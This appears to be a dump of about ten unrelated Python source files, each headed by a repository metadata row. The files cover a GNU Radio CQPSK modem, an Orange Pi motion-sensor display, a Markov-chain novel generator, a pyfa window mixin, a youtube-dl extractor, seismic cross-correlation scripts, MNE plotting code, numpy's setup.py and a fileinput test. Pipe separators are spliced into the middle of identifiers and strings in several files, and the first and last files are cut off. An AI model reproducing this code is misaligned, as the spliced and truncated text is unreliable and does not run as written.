print "\nModulator:"
print "bits per symbol: %d" % self.bits_per_symbol()
print "Gray code: %s" % self._gray_code
print "RRS roll-off factor: %f" % self._excess_bw
def _setup_logging(self):
print "Modulation logging turned on."
self.connect(self.bytes2chunks,
blocks.file_sink(gr.sizeof_char, "tx_bytes2chunks.dat"))
self.connect(self.symbol_mapper,
blocks.file_sink(gr.sizeof_char, "tx_graycoder.dat"))
self.connect(self.diffenc,
blocks.file_sink(gr.sizeof_char, "tx_diffenc.dat"))
self.connect(self.chunks2symbols,
blocks.file_sink(gr.sizeof_gr_complex, "tx_chunks2symbols.dat"))
self.connect(self.rrc_filter,
blocks.file_sink(gr.sizeof_gr_complex, "tx_rrc_filter.dat"))
def add_options(parser):
"""
Adds QPSK modulation-specific options to the standard parser
"""
parser.add_option("", "--excess-bw", type="float", default=_def_excess_bw,
help="set RRC excess bandwith factor [default=%default] (PSK)")
parser.add_option("", "--no-gray-code", dest="gray_code",
action="store_false", default=_def_gray_code,
help="disable gray coding on modulated bits (PSK)")
add_options=staticmethod(add_options)
def extract_kwargs_from_options(options):
"""
Given command line options, create dictionary suitable for passing to __init__
"""
return modulation_utils.extract_kwargs_from_options(dqpsk_mod.__init__,
('self',), options)
extract_kwargs_from_options=staticmethod(extract_kwargs_from_options)
# /////////////////////////////////////////////////////////////////////////////
# CQPSK demodulator
#
# /////////////////////////////////////////////////////////////////////////////
class cqpsk_demod(gr.hier_block2):
def __init__(self,
samples_per_symbol=_def_samples_per_symbol,
excess_bw=_def_excess_bw,
costas_alpha=_def_costas_alpha,
gain_mu=_def_gain_mu,
mu=_def_mu,
omega_relative_limit=_def_omega_relative_limit,
gray_code=_def_gray_code,
verbose=_def_verbose,
log=_def_log):
"""
Hierarchical block for RRC-filtered CQPSK demodulation
The input is the complex modulated signal at baseband.
The output is a stream of floats in [ -3 / -1 / +1 / +3 ]
@param samples_per_symbol: samples per symbol >= 2
@type samples_per_symbol: float
@param excess_bw: Root-raised cosine filter excess bandwidth
@type excess_bw: float
@param costas_alpha: loop filter gain
@type costas_alphas: float
@param gain_mu: for M&M block
@type gain_mu: float
@param mu: for M&M block
@type mu: float
@param omega_relative_limit: for M&M block
@type omega_relative_limit: float
@param gray_code: Tell modulator to Gray code the bits
@type gray_code: bool
@param verbose: Print information about modulator?
@type verbose: bool
@param debug: Print modualtion data to files?
@type debug: bool
"""
gr.hier_block2.__init__(self, "cqpsk_demod",
gr.io_signature(1, 1, gr.sizeof_gr_complex), # Input signature
gr.io_signature(1, 1, gr.sizeof_float)) # Output signature
self._samples_per_symbol |
mhkyg/OrangePIStuff | motion/motion.py | Python | mit | 2,565 | 0.061009 | #!/usr/bin/python
# coding=UTF-8
#import RPi.GPIO as GPIO_detector #raspberry version
from pyA20.gpio import gpio
import time
import datetime
import locale
import sys
import os
from char_lcd2 import OrangePiZero_CharLCD as LCD
def file_get_contents(filename):
with open(filename) as f:
return f.read()
# Orange Pi pin configuration:
lcd_rs = 14
lcd_en = 10
lcd_d4 = 12
lcd_d5 = 11
lcd_d6 = 6
lcd_d7 = 0
lcd_backlight = 13
# Define LCD column and row size for 16x2 LCD.
lcd_columns = 16
lcd_rows = 2
#GPIO_detector.setmode(GPIO_detector.BCM)
PIR_PIN = 16
#GPIO_detector.setup(PIR_PIN, GPIO_detector.IN)
lcd = LCD(lcd_rs, lcd_en, lcd_d4, lcd_d5, lcd_d6, lcd_d7,
lcd_columns, lcd_rows, lcd_backlight)
lcd.create_char(0,[ 2,4,14,1,15,17,15,0]); # á
lcd.create_char(1,[ 2,4,14,17,30,16,14,0]); # é
lcd.create_char(2,[ 10,0,0,17,17,17,14,0]); # ü
lcd.create_char(3,[ 10,0,14,17,17,17,14,0]); # ö
lcd.create_char(4,[ 5,10,14,17,17,17,14,0]); # ő
def MOTION():
week_days = ["Vas\x00rnap","H\x01tf\x04","Kedd","Szerda","Cs\x02t\x03rt\x03k","P\x01ntek","Szombat"]
#het_napjai = ["Kedd","Szerda","Csütörtök","P\x01ntek","Szombat","Vas\x00rnap","\x00\x01\x02\x03\x04"]
lcd.clear()
#print("lite on")
lcd.set_backlight(0)
lcd_text = file_get_contents(os.path.dirname(os.path.abspath(__file__)) + "/../data/k | ijelzo.txt");
for x in range(0, 4):
if (x % 2) == 0 :
time_data = datetime.datetime.now().strftime('%Y-%m-%d') +' '+ datetime.datetime.now().strftime('%H:%M:%S') +'\n'+ week_days[int(datetime.datetime.now().strftime('%w'))] ;
lcd.clear()
lcd.message(time_data);
else:
lcd.clear()
lcd.message( lcd_text);
time.sleep(5.0);
|
print(lcd_text);
lcd.clear()
lcd.set_backlight(1)
gpio.setcfg(PIR_PIN, gpio.INPUT)
gpio.pullup(PIR_PIN, gpio.PULLUP)
# endless loop
try:
#GPIO_detector.add_event_detect(PIR_PIN, GPIO_detector.RISING, callback=MOTION, bouncetime=300)
print("event atached start loop");
count = 0
while 1:
if (gpio.input(PIR_PIN)==1):
count += 1;
if count > 1 :
MOTION()
time.sleep(0.1)
else:
#print "no Motion"
count = 0
time.sleep(0.1)
except KeyboardInterrupt:
print(" Quit")
lcd.set_backlight(1)
#GPIO_detector.cleanup()
#except:
# print "Unexpected error:", sys.exc_info()[0]
# lcd.set_backlight(1)
#
|
Agrajag-Petunia/existential-romantic-novel | run.py | Python | mit | 1,939 | 0 | from datetime import datetime
from src.textgenerator import TextGenerator
from src.utils import extract_project_gutenberg_novel, remove_titles
# The source files to use
# NOTE: Ulysses makes the generated text just a little too weird.
files = [
'./data/life_and_amours.txt',
'./data/memoirs_of_fanny_hill.txt',
'./data/metamorphosis.txt',
'./data/the_romance_of_lust.txt',
'./data/the_trial.txt',
# './data/ulysses.txt',
'./data/the_antichrist.txt',
'./data/beyond_good_and_evil.txt',
]
total_word_count = 50000
chapters = 23
words_per_chapter = int(50000 / 23)
output = ""
# Build our text generator (I found a prefix length of 2 or 3 worked best)
model = TextGenerator(prefix_length=3)
# Just to remind you which novels are being used
print(files)
# Iterate over our files
for filename in files:
# For each file read in the text and work it into our
# model.
with open(filename, 'r') as fobj:
print('Learning text from {}...'.format(filename))
# | remove project gutenberg license stuff from the text
text = extract_project_gutenberg_novel(fobj.read())
# Strip the title, chapters, etc from the text.
text = remove_titles(text)
# Learn the cleaned up text
model.learn(text)
# Start generating our novel
with open('./data/novel.txt', 'w') as fobj:
# Start by printing out summary content
fobj.write("Y | ou are free and that is why you lust\n")
fobj.write("=====================================\n\n")
fobj.write("Author: Agrajag Petunia's computer\n")
fobj.write("Generation Date: {}\n\n".format(
datetime.now().strftime("%Y-%m-%d")
))
# For each chapter generate some text
for c in range(1, chapters + 1):
fobj.write("\n\n\tChapter {}\n".format(c))
fobj.write("---------------------------\n")
output = model.generate(size=words_per_chapter)
fobj.write(output)
|
pyfa-org/Pyfa | gui/auxWindow.py | Python | gpl-3.0 | 2,871 | 0.001393 | # =============================================================================
# Copyright (C) 2010 Diego Duclos
#
# This file is part of pyfa.
#
# pyfa is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# pyfa is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A | PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with pyfa. If not, see <http://www.gnu.org/licenses/>.
# =============================================================== | ==============
# noinspection PyPackageRequirements
import wx
class AuxiliaryMixin:
_instance = None
def __init__(self, parent, id=None, title=None, pos=None, size=None, style=None, name=None, resizeable=False):
baseStyle = wx.FRAME_NO_TASKBAR | wx.CAPTION | wx.CLOSE_BOX | wx.SYSTEM_MENU
if parent is not None:
baseStyle = baseStyle | wx.FRAME_FLOAT_ON_PARENT
if resizeable:
baseStyle = baseStyle | wx.RESIZE_BORDER | wx.MAXIMIZE_BOX
kwargs = {
'parent': parent,
'style': baseStyle if style is None else baseStyle | style}
if id is not None:
kwargs['id'] = id
if title is not None:
kwargs['title'] = title
if pos is not None:
kwargs['pos'] = pos
if size is not None:
kwargs['size'] = size
if name is not None:
kwargs['name'] = name
super().__init__(**kwargs)
# Intercept copy-paste actions and do nothing in secondary windows,
# otherwise on Mac OS X Cmd-C brings up copy fit dialog
if 'wxMac' in wx.PlatformInfo:
self.Bind(wx.EVT_MENU, self.OnSuppressedAction, id=wx.ID_COPY)
self.Bind(wx.EVT_MENU, self.OnSuppressedAction, id=wx.ID_PASTE)
if 'wxMSW' in wx.PlatformInfo:
self.SetBackgroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_BTNFACE))
@classmethod
def openOne(cls, parent, *args, forceReopen=False, **kwargs):
"""If window is open and alive - raise it, open otherwise"""
if not cls._instance or forceReopen:
if cls._instance:
cls._instance.Close()
frame = cls(parent, *args, **kwargs)
cls._instance = frame
frame.Show()
else:
cls._instance.Raise()
return cls._instance
def OnSuppressedAction(self, event):
return
class AuxiliaryFrame(AuxiliaryMixin, wx.Frame):
pass
class AuxiliaryDialog(AuxiliaryMixin, wx.Dialog):
pass
|
nandhp/youtube-dl | youtube_dl/extractor/porn91.py | Python | unlicense | 2,707 | 0.00076 | # encoding: utf-8
from __future__ import unicode_literals
from ..compat import (
compat_urllib_parse_unquote,
compat_urllib_parse_urlencode,
)
from .common import InfoExtractor
from ..utils import (
parse_duration,
int_or_none,
ExtractorError,
)
class Porn91IE(InfoExtractor):
IE_NAME = '91porn'
_VALID_URL = r'(?:https?://)(?:www\.|)91porn\.com/.+?\?viewkey=(?P<id>[\w\d]+)'
_TEST = {
'url': 'http://91porn.com/view_video.php?viewkey=7e42283b4f5ab36da134',
'md5': '6df8f6d028bc8b14f5dbd73af742fb20',
'info_dict': {
'id': '7e42283b4f5ab36da134',
'title': '18岁大一漂亮学妹,水嫩性感,再爽一次!',
'ext': 'mp4',
'duration': 431,
'age_limit': 18,
}
}
def _real_extract(self, url):
video_id = self._match_id(url)
self._set_cookie('91porn.com', 'language', 'cn_CN')
webpage = self._download_webpage(
'http://91porn.com/view_video.php?viewkey=%s' % video_id, video_id)
if '作为游客,你每天只可观看10个视频' in webpage:
raise ExtractorError('91 Porn says: Daily limit 10 videos exceeded', expected=True)
title = self._search_regex(
r'<div id="viewvideo-title">([^<]+)</div>', webpage, 'title')
title = title.replace('\n', '')
# get real url
file_id = self._search_regex(
r'so.addVariable\(\'file\',\'(\d+)\'', webpage, 'file id')
sec_code = self._search_regex(
r'so.addVariable\(\'seccode\',\'([^\']+)\'', webpage, 'sec code')
max_vid = self._search_regex(
r'so.addVariable\(\'max_vid\',\'(\d+)\'', webpage, 'max vid')
url_params = compat_urllib_parse_urlencode({
'VID': file_id,
'mp4': '1',
'seccode': sec_code | ,
'max_vid': max_vid,
| })
info_cn = self._download_webpage(
'http://91porn.com/getfile.php?' + url_params, video_id,
'Downloading real video url')
video_url = compat_urllib_parse_unquote(self._search_regex(
r'file=([^&]+)&', info_cn, 'url'))
duration = parse_duration(self._search_regex(
r'时长:\s*</span>\s*(\d+:\d+)', webpage, 'duration', fatal=False))
comment_count = int_or_none(self._search_regex(
r'留言:\s*</span>\s*(\d+)', webpage, 'comment count', fatal=False))
return {
'id': video_id,
'title': title,
'url': video_url,
'duration': duration,
'comment_count': comment_count,
'age_limit': self._rta_search(webpage),
}
|
trichter/sito | bin/noise/noise_s_final_autocorr2.py | Python | mit | 5,012 | 0.006185 | #!/usr/bin/env python
# by TR
from obspy.core import UTCDateTime as UTC
from sito.data import IPOC
from sito.noisexcorr import (prepare, get_correlations,
plotXcorrs, noisexcorrf, stack)
from sito import util
import matplotlib.pyplot as plt
from sito.stream import read
from multiprocessing import Pool
import time
from sito import seismometer
def main():
stations = 'PB01 PB02 PB03 PB04 PB05 PB06 PB07 PB08 HMBCX MNMCX PATCX PSGCX LVC'
#stations = 'PB09 PB10 PB11 PB12 PB13 PB14 PB15 PB16'
stations2 = None
components = 'Z'
# TOcopilla earthquake: 2007-11-14 15:14
t1 = UTC('2006-02-01')
t2 = UTC('2012-10-01')
shift = 100
correlations = get_correlations(stations, components, stations2, only_auto=True)
method = 'FINAL_filter1-3_1bit_auto'
data = IPOC(xcorr_append='/' + method, use_local_LVC=False)
data.setXLogger('_' + method)
# pool = Pool()
# prepare(data, stations.split(), t1, t2, component=components,
# filter=(1, 3, 2, True), downsample=20,
# eventremoval='waterlevel_env2', param_removal=(10, 0),
# whitening=False,
# normalize='1bit', param_norm=None,
# pool=pool)
# noisexcorrf(data, correlations, t1, t2, shift, pool=pool)
# pool.close()
# pool.join()
# plotXcorrs(data, correlations, t1, t2, start=None, end=None, plot_overview=True, plot_years=False, use_dlognorm=False,
# plot_stack=True, plot_psd=False, add_to_title='', downsample=None)
plt.rc('font', size=16)
plotXcorrs(data, correlations, t1, t2, start=0, end=20, plot_overview=True, plot_years=False, use_dlognorm=False,
plot_stack=True, plot_psd=False, downsample=None, ext='_hg_dis.pdf', vmax=0.1, ylabel=None,
add_to_title='1-3Hz')
# stack(data, correlations, dt= -1)
# stack(data, correlations, dt=10 * 24 * 3600, shift=2 * 24 * 3600)
# plotXcorrs(data, correlations, t1=None, t2=None, start=None, end=None, plot_overview=True, plot_years=False, use_dlognorm=False,
# plot_stack=True, plot_psd=False, add_to_title='', downsample=None,
# stack=('10days', '2days'))
# plotXcorrs(data, correlations, t1=None, t2=None, start=0, end=20, plot_overview=True, plot_years=False, use_dlognorm=False,
# plot_stack=True, plot_psd=False, add_to_title='', downsample=None,
# stack=('10days', '2days'), ext='_hg.png', vmax=0.1)
# util.checkDir(data.getPlotX(('', ''), t1))
#for correlation in correlations:
# stations = correlation[0][:-1], corr | elation[1][:-1]
# dist = data.stations.dist(*stations)
## if dist >= 120:
## t = (dist // 100) * 50 + 50
## else:
## t = 70
# t = 200
# stream = data.readDayXcorr(correlation, t1, t2)
# if len(stream) > 0:
# stream.plotXcorr(-t, t, imshow=True, vmax=0.01, vmin_rel='vmax',
# fig=plt.figure(figsize=(8.267, 11.693)),
# figtitle='station ' + method + ' around To | copilla event',
# dateformatter='%y-%m-%d', show=False,
# save=data.getPlotX(correlation, 'Tocopilla_0.01.png'),
# stack_lim=None)
#
# method = 'rm5_filter0.1-1'
# data = IPOC(xcorr_append='/tests/' + method, use_local_LVC=True)
# data.setXLogger('_' + method)
# prepare(data, stations.split(' '), t1, t2, filter=(0.1, 1.), downsample=10,
# component=components, normalize='runningmean', norm_param=5 * 10 + 1,
# use_floating_stream=True)
# xcorr_day(data, correlations, t1, t2, shift, use_floating_stream=True)
# plotXcorrs(data, correlations, t1, t2, plot_overview=False, plot_stack=True, plot_psd=True, add_to_title=method)
#
#
# method = 'rm50_filter0.01'
# data = IPOC(xcorr_append='/tests/' + method, use_local_LVC=True)
# data.setXLogger('_' + method)
# prepare(data, stations.split(' '), t1, t2, filter=(0.01, None), downsample=None,
# component=components, normalize='runningmean', norm_param=50 * 100 + 1,
# use_floating_stream=True)
# xcorr_day(data, correlations, t1, t2, shift, use_floating_stream=True)
# plotXcorrs(data, correlations, t1, t2, plot_overview=False, plot_stack=True, plot_psd=True, add_to_title=method)
#
#
# method = 'rm0.25_filter2'
# data = IPOC(xcorr_append='/tests/' + method, use_local_LVC=True)
# data.setXLogger('_' + method)
# prepare(data, stations.split(' '), t1, t2, filter=(2, None), downsample=None,
# component=components, normalize='runningmean', norm_param=100 // 4 + 1,
# use_floating_stream=True)
# xcorr_day(data, correlations, t1, t2, shift, use_floating_stream=True)
# plotXcorrs(data, correlations, t1, t2, plot_overview=False, plot_stack=True, plot_psd=True, add_to_title=method)
if __name__ == '__main__':
main()
|
teonlamont/mne-python | mne/viz/evoked.py | Python | bsd-3-clause | 94,662 | 0.000011 | # -*- coding: utf-8 -*-
"""Functions to plot evoked M/EEG data (besides topographies)."""
from __future__ import print_function
# Authors: Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
# Denis Engemann <denis.engemann@gmail.com>
# Martin Luessi <mluessi@nmr.mgh.harvard.edu>
# Eric Larson <larson.eric.d@gmail.com>
# Cathy Nangini <cnangini@gmail.com>
# Mainak Jas <mainak@neuro.hut.fi>
#
# License: Simplified BSD
from functools import partial
from copy import deepcopy
from numbers import Integral
import numpy as np
from ..io.pick import (channel_type, _pick_data_channels,
_VALID_CHANNEL_TYPES, channel_indices_by_type,
_DATA_CH_TYPES_SPLIT, _pick_inst, _get_channel_types,
_PICK_TYPES_DATA_DICT)
from ..externals.six import string_types
from ..defaults import _handle_default
from .utils import (_draw_proj_checkbox, tight_layout, _check_delayed_ssp,
plt_show, _process_times, DraggableColorbar, _setup_cmap,
_setup_vmin_vmax, _grad_pair_pick_and_name, _check_cov,
_validate_if_list_of_axes, _triage_rank_sss,
_connection_line, _get_color_list, _setup_ax_spines,
_setup_plot_projector, _prepare_joint_axes,
_set_title_multiple_electrodes, _check_time_unit,
_plot_masked_image)
from ..utils import (logger, _clean_names, warn, _pl, verbose, _validate_type,
_check_if_nan)
from .topo import _plot_evoked_topo
from .topomap import (_prepare_topo_plot, plot_topomap, _check_outlines,
_draw_outlines, _prepare_topomap, _set_contour_locator)
from ..channels.layout import _pair_grad_sensors, _auto_topomap_coords
def _butterfly_onpick(event, params):
"""Add a channel name on click."""
params['need_draw'] = True
ax = event.artist.axes
ax_idx = np.where([ax is a for a in params['axes']])[0]
if len(ax_idx) == 0: # this can happen if ax param is used
return # let the other axes handle it
else:
ax_idx = ax_idx[0]
lidx = np.where([l is event.artist for l in params['lines'][ax_idx]])[0][0]
ch_name = params['ch_names'][params['idxs'][ax_idx][lidx]]
text = params['texts'][ax_idx]
x = event.artist.get_xdata()[event.ind[0]]
y = event.artist.get_ydata()[event.ind[0]]
text.set_x(x)
text.set_y(y)
text.set_text(ch_name)
text.set_color(event.artist.get_color())
text.set_alpha(1.)
text.set_zorder(len(ax.lines)) # to make sure it goes on top of the lines
text.set_path_effects(params['path_effects'])
# do NOT redraw here, since for butterfly plots hundreds of lines could
# potentially be picked -- use on_button_press (happens once per click)
# to do the drawing
def _butterfly_on_button_press(event, params):
"""Only draw once for picking."""
if params['need_draw']:
event.canvas.draw()
else:
idx = np.where([event.inaxes is ax for ax in params['axes']])[0]
if len(idx) == 1:
text = params['texts'][idx[0]]
text.set_alpha(0.)
text.set_path_effects([])
event.canvas.draw()
params['need_draw'] = False
def _line_plot_onselect(xmin, xmax, ch_types, info, data, times, text=None,
psd=False, time_unit='s'):
"""Draw topomaps from the selected area."""
import matplotlib.pyplot as plt
ch_types = [type_ for type_ in ch_types if type_ in ('eeg', 'grad', 'mag')]
if len(ch_types) == 0:
raise ValueError('Interactive topomaps only allowed for EEG '
'and MEG channels.')
if ('grad' in ch_types and
len(_pair_grad_sensors(info, topomap_coords=False,
raise_error=False)) < 2):
ch_types.remove('grad')
if len(ch_types) == 0:
return
vert_lines = list()
if text is not None:
text.set_visible(True)
ax = text.axes
vert_lines.append(ax.axvline(xmin, zorder=0, color='red'))
vert_lines.append(ax.axvline(xmax, zorder=0, color='red'))
fill = ax.axvspan(xmin, xmax, alpha=0.2, color='green')
evoked_fig = plt.gcf()
evoked_fig.canvas.draw()
evoked_fig.canvas.flush_events()
minidx = np.abs(times - xmin).argmin()
maxidx = np.ab | s(times - xmax).argmin()
fig, axarr = plt.subplots(1, len(ch_types), squeeze=False,
figsize=(3 * len(ch_types), 3))
for idx, ch_type in enumerate(ch_types):
if ch_type not in ('eeg', 'grad', 'mag'):
continu | e
picks, pos, merge_grads, _, ch_type = _prepare_topo_plot(
info, ch_type, layout=None)
if len(pos) < 2:
fig.delaxes(axarr[0][idx])
continue
this_data = data[picks, minidx:maxidx]
if merge_grads:
from ..channels.layout import _merge_grad_data
method = 'mean' if psd else 'rms'
this_data = _merge_grad_data(this_data, method=method)
title = '%s %s' % (ch_type, method.upper())
else:
title = ch_type
this_data = np.average(this_data, axis=1)
axarr[0][idx].set_title(title)
vmin = min(this_data) if psd else None
vmax = max(this_data) if psd else None # All negative for dB psd.
cmap = 'Reds' if psd else None
plot_topomap(this_data, pos, cmap=cmap, vmin=vmin, vmax=vmax,
axes=axarr[0][idx], show=False)
unit = 'Hz' if psd else time_unit
fig.suptitle('Average over %.2f%s - %.2f%s' % (xmin, unit, xmax, unit),
y=0.1)
tight_layout(pad=2.0, fig=fig)
plt_show()
if text is not None:
text.set_visible(False)
close_callback = partial(_topo_closed, ax=ax, lines=vert_lines,
fill=fill)
fig.canvas.mpl_connect('close_event', close_callback)
evoked_fig.canvas.draw()
evoked_fig.canvas.flush_events()
def _topo_closed(events, ax, lines, fill):
"""Remove lines from evoked plot as topomap is closed."""
for line in lines:
ax.lines.remove(line)
ax.patches.remove(fill)
ax.get_figure().canvas.draw()
def _rgb(x, y, z):
"""Transform x, y, z values into RGB colors."""
rgb = np.array([x, y, z]).T
rgb -= rgb.min(0)
rgb /= np.maximum(rgb.max(0), 1e-16) # avoid div by zero
return rgb
def _plot_legend(pos, colors, axis, bads, outlines, loc, size=30):
"""Plot (possibly colorized) channel legends for evoked plots."""
from mpl_toolkits.axes_grid1.inset_locator import inset_axes
axis.get_figure().canvas.draw()
bbox = axis.get_window_extent() # Determine the correct size.
ratio = bbox.width / bbox.height
ax = inset_axes(axis, width=str(size / ratio) + '%',
height=str(size) + '%', loc=loc)
ax.set_adjustable("box")
pos_x, pos_y = _prepare_topomap(pos, ax, check_nonzero=False)
ax.scatter(pos_x, pos_y, color=colors, s=size * .8, marker='.', zorder=1)
if bads:
bads = np.array(bads)
ax.scatter(pos_x[bads], pos_y[bads], s=size / 6, marker='.',
color='w', zorder=1)
_draw_outlines(ax, outlines)
def _plot_evoked(evoked, picks, exclude, unit, show, ylim, proj, xlim, hline,
units, scalings, titles, axes, plot_type, cmap=None,
gfp=False, window_title=None, spatial_colors=False,
set_tight_layout=True, selectable=True, zorder='unsorted',
noise_cov=None, colorbar=True, mask=None, mask_style=None,
mask_cmap=None, mask_alpha=.25, time_unit='s',
show_names=False, group_by=None):
"""Aux function for plot_evoked and plot_evoked_image (cf. docstrings).
Extra param is:
plot_type : str, value ('butterfly' | 'image')
The type of graph to plot: 'butterfly' plots each channel as a line
(x axis: time, y axis: amplitude). 'image' plots a 2D image where
color depicts the amplitude |
tiborsimko/invenio-formatter | invenio_formatter/config.py | Python | mit | 479 | 0 | # -*- coding: utf-8 -*-
#
# | This file is part of Invenio.
# Copyright (C) 2016-2018 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Configuration for Invenio-Formatter."""
from __future__ import absolute_import, print_ | function
FORMATTER_BADGES_ALLOWED_TITLES = ['DOI']
"""List of allowed titles in badges."""
FORMATTER_BADGES_TITLE_MAPPING = {}
"""Mapping of titles."""
|
endolith/numpy | setup.py | Python | bsd-3-clause | 17,447 | 0.002923 | #!/usr/bin/env python3
""" NumPy is the fundamental package for array computing with Python.
It provides:
- a powerful N-dimensional array object
- sophisticated (broadcasting) functions
- tools for integrating C/C++ and Fortran code
- useful linear algebra, Fourier transform, and random number capabilities
- and much more
Besides its obvious scientific uses, NumPy can also be used as an efficient
multi-dimensional container of generic data. Arbitrary data-types can be
defined. This allows NumPy to seamlessly and speedily integrate with a wide
variety of databases.
All NumPy wheels distributed on PyPI are BSD licensed.
"""
DOCLINES = (__doc__ or '').split("\n")
import os
import sys
import subprocess
import textwrap
import sysconfig
if sys.version_info[:2] < (3, 6):
raise RuntimeError("Python version >= 3.6 required.")
import builtins
CLASSIFIERS = """\
Development Status :: 5 - Production/Stable
Intended Audience :: Science/Research
Intended Audience :: Developers
License :: OSI Approved
Programming Language :: C
Programming Language :: Python
Programming Language :: Python :: 3
Programming Language :: Python :: 3.6
Programming Language :: Python :: 3.7
Programming Language :: Python :: 3.8
Programming Language :: Python :: 3 :: Only
Programming Language :: Python :: Implementation :: CPython
Topic :: Software Development
Topic :: Scientific/Engineering
Operating System :: Microsoft :: Windows
Operating System :: POSIX
Operating System :: Unix
Operating System :: MacOS
"""
MAJOR = 1
MINOR = 19
MICRO = 0
ISRELEASED = False
VERSION = '%d.%d.%d' % (MAJOR, MINOR, MICRO)
# Return the git revision as a string
def git_version():
def _minimal_ext_cmd(cmd):
# construct minimal environment
env = {}
for k in ['SYSTEMROOT', 'PATH', 'HOME']:
v = os.environ.get(k)
if v is not None:
env[k] = v
# LANGUAGE is used on win32
env['LANGUAGE'] = 'C'
env['LANG'] = 'C'
env['LC_ALL'] = 'C'
out = subprocess.check_output(cmd, stderr=subprocess.STDOUT, env=env)
return out
try:
out = _minimal_ext_cmd(['git', 'rev-parse', 'HEAD'])
GIT_REVISION = out.strip().decode('ascii')
except (subprocess.SubprocessError, OSError):
GIT_REVISION = "Unknown"
if not GIT_REVISION:
# this shouldn't happen but apparently can (see gh-8512)
GIT_REVISION = "Unknown"
return GIT_REVISION
# BEFORE importing setuptools, remove MANIFEST. Otherwise it may not be
# properly updated when the contents of directories change (true for distutils,
# not sure about setuptools).
if os.path.exists('MANIFEST'):
os.remove('MANIFEST')
# This is a bit hackish: we are setting a global variable so that the main
# numpy __init__ can detect if it is being loaded by the setup routine, to
# avoid attempting to load components that aren't built yet. While ugly, it's
# a lot more robust than what was previously being used.
builtins.__NUMPY_SETUP__ = True
def get_version_info():
# Adding the git rev number needs to be done inside write_version_py(),
# otherwise the import of numpy.version messes up the build under Python 3.
FULLVERSION = VERSION
if os.path.exists('.git'):
GIT_REVISION = git_version()
elif os.path.exists('numpy/version.py'):
# must be a source distribution, use existing version file
try:
from numpy.version import git_revision as GIT_REVISION
except ImportError:
raise ImportError("Unable to import git_revision. Try removing "
"numpy/version.py and the build directory "
"before building.")
else:
GIT_REVISION = "Unknown"
if not ISRELEASED:
FULLVERSION += '.dev0+' + GIT_REVISION[:7]
return FULLVERSION, GIT_REVISION
def write_version_py(filename='numpy/version.py'):
cnt = """
# THIS FILE IS GENERATED FROM NUMPY SETUP.PY
#
# To compare versions robustly, use `numpy.lib.NumpyVersion`
short_version = '%(version)s'
version = '%(version)s'
full_version = '%(full_version)s'
git_revision = '%(git_revision)s'
release = %(isrelease)s
if not release:
version = full_version
"""
FULLVERSION, GIT_REVISION = get_version_info()
a = open(filename, 'w')
try:
a.write(cnt % {'version': VERSION,
'full_version': FULLVERSION,
'git_revision': GIT_REVISION,
'isrelease': str(ISRELEASED)})
finally:
a.close()
def configuration(parent_package='',top_path=None):
from numpy.distutils.misc_util import Configuration
config = Configuration(None, parent_package, top_path)
config.set_options(ignore_setup_xxx_py=True,
assume_default_configuration=True,
delegate_options_to_subpackages=True,
quiet=True)
config.add_subpackage('numpy')
config.add_data_files(('numpy', 'LICENSE.txt'))
config.add_data_files(('numpy', 'numpy/__init__.pxd'))
config.get_version('numpy/version.py') # sets config.version
return config
def check_submodules():
""" verify that the submodules are checked out and clean
use `git submodule update --init`; on failure
"""
if not os.path.exists('.git'):
return
with open('.gitmodules') as f:
for l in f:
if 'path' in l:
p = l.split('=')[-1].strip()
if not os.path.exists(p):
raise ValueError(f'Submodule {p} missing')
proc = subprocess.Popen(['git', 'submodule', 'status'],
stdout=subprocess.PIPE)
status, _ = proc.communicate()
status = status.decode("ascii", "replace")
for line in status.splitlines():
if line.startswith('-') or line.startswith('+'):
raise ValueError(f'Submodule not clean: {line}')
class concat_license_files():
"""Merge LICENSE.txt and LICENSES_bundled.txt for sdist creation
Done this way to keep LICENSE.txt in repo as exact BSD 3-clause (see
gh-13447). This makes GitHub state correctly how NumPy is licensed.
"""
def __init__(self):
self.f1 = 'LICENSE.txt'
self.f2 = 'LICENSES_bundled.txt'
def __enter__(self):
"""Concatenate files and remove LICENSES_bundled.txt"""
with open(self.f1, 'r') as f1:
self.bsd_text = f1.read()
with open(self.f1, 'a') as f1:
with open(self.f2, 'r') as f2:
self.bundled_text = f2.read()
f1.write('\n\n')
f1.write(self.bundled_text)
def __exit__(self, exception_type, exception_value, traceback):
"""Restore content of both files"""
with open(self.f1, 'w') as f:
f.write(self.bsd_text)
from distutils.command.sdist import sdist
class sdist_checked(sdist):
""" check submodules on sdist to prevent incomplete tarballs """
def run(self):
check_submodules()
with concat_license_files():
sdist.run(self)
def get_build_overrides():
"""
Custom build commands to add `-std=c99` to compilation
"""
from numpy.distutils.command.build_clib import build_clib
from numpy.distutils.command.build_ext import build_ext
def _is_using_gcc(obj):
is_gcc = False
if obj.compiler.compiler_type == 'unix':
cc = sysconfig.get_config_var("CC")
if not cc:
cc = ""
compiler_name = os.path.basename(cc)
is_gcc = "gcc" in compiler_name
return is_gcc
| class new_build_clib(build_clib):
def build_a_library(self, build_info, lib_name | , libraries):
if _is_using_gcc(self):
args = build_info.get('extra_compiler_args') or []
args.append('-std=c99')
build_info['extra_compiler_args'] = args
build_clib.build_a_library(self, build_info, lib_name, libraries)
class new_build_ext(build_ext):
def build_exten |
yotchang4s/cafebabepy | src/main/python/test/test_fileinput.py | Python | bsd-3-clause | 38,669 | 0.001215 | '''
Tests for fileinput module.
Nick Mathewson
'''
import os
import sys
import re
import fileinput
import collections
import builtins
import unittest
try:
import bz2
except ImportError:
bz2 = None
try:
import gzip
except ImportError:
gzip = None
from io import BytesIO, StringIO
from fileinput import FileInput, hook_encoded
from test.support import verbose, TESTFN, check_warnings
from test.support import unlink as safe_unlink
from test import support
from unittest import mock
# The fileinput module has 2 interfaces: the FileInput class which does
# all the work, and a few functions (input, etc.) that use a global _state
# variable.
# Write lines (a list of lines) to temp file number i, and return the
# temp file's name.
def writeTmp(i, lines, mode='w'): # opening in text mode is the default
name = TESTFN + str(i)
f = open(name, mode)
for line in lines:
f.write(line)
f.close()
return name
def remove_tempfiles(*names):
for name in names:
if name:
safe_unlink(name)
class LineReader:
def __init__(self):
